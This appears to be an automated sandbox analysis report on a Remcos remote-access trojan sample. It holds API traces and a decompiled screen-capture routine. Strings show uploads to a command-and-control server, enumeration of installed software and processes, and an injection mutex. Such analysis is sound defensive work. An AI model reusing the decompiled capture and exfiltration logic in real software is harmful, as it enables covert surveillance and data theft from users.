                                                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                                                                • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                                                                • GlobalFree.KERNEL32 ref: 0040FDCA
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@CompatibleInfoMonitor$BitmapFreeGlobalSelect
                                                                                • String ID: $BM$DISPLAY
                                                                                • API String ID: 585525397-871886180
                                                                                • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                                                                • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                                                                • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                                                                • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00402038: #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • GetFileSize.KERNEL32(00000000,?,?,0041B310,00000000), ref: 0040387B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 004038AA
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038C8
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038D9
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004038EA
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004038F3
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00403940
                                                                                • SetFilePointer.KERNEL32(?,?,?,?), ref: 00403954
                                                                                • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403968
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403978
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040398E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@
                                                                                • String ID: Uploading file to C&C: $[INFO]
                                                                                • API String ID: 18894167-3151135581
                                                                                • Opcode ID: ede4ef49983f38962c8be3cbc944f631a8af31d3ddf6f3e878268fb130776691
                                                                                • Instruction ID: b6d78ebecc7f0a5a63fa064e60f12d61dcf64d9c80a512a797ec440d8275d993
                                                                                • Opcode Fuzzy Hash: ede4ef49983f38962c8be3cbc944f631a8af31d3ddf6f3e878268fb130776691
                                                                                • Instruction Fuzzy Hash: B8C107B1C0010DEBDF05EFA1EC89DEEBB78EF54345F10806AF415A21A1EB755A89CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 59%
                                                                                			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
                                                                                				struct HDC__* _v8;
                                                                                				void* _v12;
                                                                                				struct HDC__* _v16;
                                                                                				int _v20;
                                                                                				int _v24;
                                                                                				int _v28;
                                                                                				char _v44;
                                                                                				intOrPtr _v50;
                                                                                				void* _v52;
                                                                                				void* _v54;
                                                                                				intOrPtr _v58;
                                                                                				char _v60;
                                                                                				char _v76;
                                                                                				intOrPtr _v80;
                                                                                				intOrPtr _v84;
                                                                                				struct HICON__* _v88;
                                                                                				char _v96;
                                                                                				signed int _v102;
                                                                                				signed int _v104;
                                                                                				long _v112;
                                                                                				long _v116;
                                                                                				char _v120;
                                                                                				struct _ICONINFO _v140;
                                                                                				int _t143;
                                                                                				void* _t144;
                                                                                				signed int _t153;
                                                                                				long _t164;
                                                                                				void* _t165;
                                                                                				char* _t189;
                                                                                				signed int _t193;
                                                                                				void* _t214;
                                                                                				signed int _t222;
                                                                                				signed char _t224;
                                                                                				signed int _t225;
                                                                                				signed int _t242;
                                                                                				struct HDC__* _t245;
                                                                                				int _t249;
                                                                                				struct tagBITMAPINFO* _t250;
                                                                                
                                                                                				_t214 = 0;
                                                                                				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
                                                                                				_v16 = _t245;
                                                                                				_v8 = CreateCompatibleDC(_t245);
                                                                                				_t248 = 0x41bfc8 + _a12 * 4;
                                                                                				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
                                                                                				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
                                                                                				_v28 = _t143;
                                                                                				if(_v12 != 0 || _t143 != 0) {
                                                                                					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
                                                                                					_a12 = _t144;
                                                                                					if(_t144 != _t214) {
                                                                                						if(SelectObject(_v8, _t144) != 0) {
                                                                                							_v24 = _t214;
                                                                                							asm("stosd");
                                                                                							E0040FF57( *_t248,  &_v24);
                                                                                							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
                                                                                								if(_a8 != 0) {
                                                                                									_v96 = 0x14;
                                                                                									_push( &_v96);
                                                                                									if( *0x41bf1c() != 0 && GetIconInfo(_v88,  &_v140) != 0) {
                                                                                										DeleteObject(_v140.hbmColor);
                                                                                										DeleteObject(_v140.hbmMask);
                                                                                										DrawIcon(_v8, _v84 - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v88);
                                                                                										_t214 = 0;
                                                                                									}
                                                                                								}
                                                                                								_push( &_v120);
                                                                                								_t249 = 0x18;
                                                                                								if(GetObjectA(_a12, _t249, ??) != 0) {
                                                                                									_t153 = _v102 * _v104;
                                                                                									_t242 = 1;
                                                                                									if(_t153 != _t242) {
                                                                                										_t222 = 4;
                                                                                										if(_t153 > _t222) {
                                                                                											_t222 = 8;
                                                                                											if(_t153 <= _t222) {
                                                                                												goto L18;
                                                                                											}
                                                                                											_t222 = 0x10;
                                                                                											if(_t153 <= _t222) {
                                                                                												goto L18;
                                                                                											}
                                                                                											if(_t153 > _t249) {
                                                                                												_a8 = 0x20;
                                                                                												L28:
                                                                                												_push(0x28 + (_t242 << _a8) * 4);
                                                                                												L23:
                                                                                												_t250 = LocalAlloc(0x40, ??);
                                                                                												_t224 = _a8;
                                                                                												_t250->bmiHeader = 0x28;
                                                                                												_t250->bmiHeader.biWidth = _v116;
                                                                                												_t250->bmiHeader.biHeight = _v112;
                                                                                												_t250->bmiHeader.biPlanes = _v104;
                                                                                												_t250->bmiHeader.biBitCount = _v102;
                                                                                												if(_t224 < 0x18) {
                                                                                													_t193 = 1;
                                                                                													_t250->bmiHeader.biClrUsed = _t193 << _t224;
                                                                                												}
                                                                                												_t225 = 8;
                                                                                												asm("cdq");
                                                                                												_t250->bmiHeader.biCompression = _t214;
                                                                                												_t250->bmiHeader.biClrImportant = _t214;
                                                                                												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
                                                                                												_t250->bmiHeader.biSizeImage = _t164;
                                                                                												_t165 = GlobalAlloc(_t214, _t164);
                                                                                												_v12 = _t165;
                                                                                												if(_t165 != _t214) {
                                                                                													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
                                                                                														_v60 = 0x4d42;
                                                                                														_v54 = _t214;
                                                                                														_v52 = _t214;
                                                                                														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
                                                                                														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
                                                                                														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                                                                														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                                                                														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
                                                                                														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                                                                														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
                                                                                														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                                                                														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
                                                                                														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                                                                														DeleteObject(_a12);
                                                                                														GlobalFree(_v12);
                                                                                														DeleteDC(_v16);
                                                                                														DeleteDC(_v8);
                                                                                														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
                                                                                														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                														goto L33;
                                                                                													}
                                                                                													DeleteDC(_v16);
                                                                                													DeleteDC(_v8);
                                                                                													DeleteObject(_a12);
                                                                                													GlobalFree(_v12);
                                                                                													_t189 =  &_a11;
                                                                                												} else {
                                                                                													DeleteDC(_v16);
                                                                                													DeleteDC(_v8);
                                                                                													DeleteObject(_a12);
                                                                                													_t189 =  &_a11;
                                                                                												}
                                                                                												goto L31;
                                                                                											}
                                                                                											_a8 = _t249;
                                                                                											_push(0x28);
                                                                                											goto L23;
                                                                                										}
                                                                                										L18:
                                                                                										_a8 = _t222;
                                                                                										goto L28;
                                                                                									}
                                                                                									_a8 = _t242;
                                                                                									goto L28;
                                                                                								} else {
                                                                                									DeleteDC(_v16);
                                                                                									DeleteDC(_v8);
                                                                                									DeleteObject(_a12);
                                                                                									_t189 =  &_a11;
                                                                                									goto L31;
                                                                                								}
                                                                                							}
                                                                                							DeleteDC(_v16);
                                                                                							DeleteDC(_v8);
                                                                                							DeleteObject(_a12);
                                                                                							_t189 =  &_a11;
                                                                                							goto L31;
                                                                                						}
                                                                                						DeleteDC(_t245);
                                                                                						DeleteDC(_v8);
                                                                                						DeleteObject(_a12);
                                                                                						_t189 =  &_a11;
                                                                                						goto L31;
                                                                                					}
                                                                                					DeleteDC(_t245);
                                                                                					DeleteDC(_v8);
                                                                                					DeleteObject(_t214);
                                                                                					_t189 =  &_a11;
                                                                                					goto L31;
                                                                                				} else {
                                                                                					_t189 =  &_a11;
                                                                                					L31:
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
                                                                                					L33:
                                                                                					return _a4;
                                                                                				}
                                                                                			}









































                                                                                0x0040fbda
                                                                                0x0040fb4b
                                                                                0x0040fb50
                                                                                0x0040fb55
                                                                                0x0040fb5b
                                                                                0x00000000
                                                                                0x0040fb5b
                                                                                0x0040faeb
                                                                                0x0040faf0
                                                                                0x0040faf5
                                                                                0x0040fafb
                                                                                0x00000000
                                                                                0x0040fafb
                                                                                0x0040fac0
                                                                                0x0040fac5
                                                                                0x0040fac8
                                                                                0x0040face
                                                                                0x00000000
                                                                                0x0040fa9f
                                                                                0x0040fa9f
                                                                                0x0040fd17
                                                                                0x0040fd20
                                                                                0x0040fdff
                                                                                0x0040fe06
                                                                                0x0040fe06

                                                                                APIs
                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                                                                • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                                                                • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                                                                • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                                                                • GlobalFree.KERNEL32 ref: 0040FDCA
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@Compatible$BitmapFreeGlobalSelect
                                                                                • String ID: $BM$DISPLAY
                                                                                • API String ID: 1151051811-871886180
                                                                                • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                                                                • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                                                                • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                                                                • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004130DF
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004130F5
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00413116
                                                                                • RegEnumKeyExA.ADVAPI32 ref: 00413135
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00413160
                                                                                • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 004131DD
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,0041623C), ref: 0041321D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00416AFC,0041623C), ref: 0041322D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                • API String ID: 1820998543-3714951968
                                                                                • Opcode ID: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                                                                • Instruction ID: 27b32b71c815465ffb7daa5c7642a7d313003b3f6ade3c30451be995a5edf32b
                                                                                • Opcode Fuzzy Hash: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                                                                • Instruction Fuzzy Hash: D791F87280011DEBCB10EB91DD49EEEBB7CEF54304F1444A6B506A3051EB759B88CFA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                                                                • Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409B88
                                                                                • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00409BAF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BB8
                                                                                • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00409BC1
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409BC8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BD7
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00409BEB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BF4
                                                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 00409C0E
                                                                                • wcslen.MSVCRT ref: 00409C25
                                                                                • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 00409C31
                                                                                • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 00409C42
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C58
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C66
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 00409C75
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409C84
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00409C93
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00409CA4
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409CAE
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 00409CCC
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00409CE5
                                                                                  • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409CEC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409CF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$?c_str@?$basic_string@D@2@@std@@D@std@@G@2@@0@$??0?$basic_string@Process32$??4?$basic_string@?begin@?$basic_string@CloseCreateG@1@@HandleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@1@@FileFirstG@2@@0@0@G@2@@0@@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                                                                • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                                                                • API String ID: 2459104678-694575909
                                                                                • Opcode ID: 8084943976f618cdb9b7c4a87dcffa8e72a97da1b1abb2ee8dfe9f65ccaf5f7c
                                                                                • Instruction ID: 7a0e813b4e10dd3dd77c68d554191e2bbc423507f4273ca30df3ab345c5067a4
                                                                                • Opcode Fuzzy Hash: 8084943976f618cdb9b7c4a87dcffa8e72a97da1b1abb2ee8dfe9f65ccaf5f7c
                                                                                • Instruction Fuzzy Hash: 2D811E7280450DEBCF04AFA0EC499EE7B78EF48355F14407AF906A70A1DB755A8ACF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 0040A91D
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A930
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040A93D
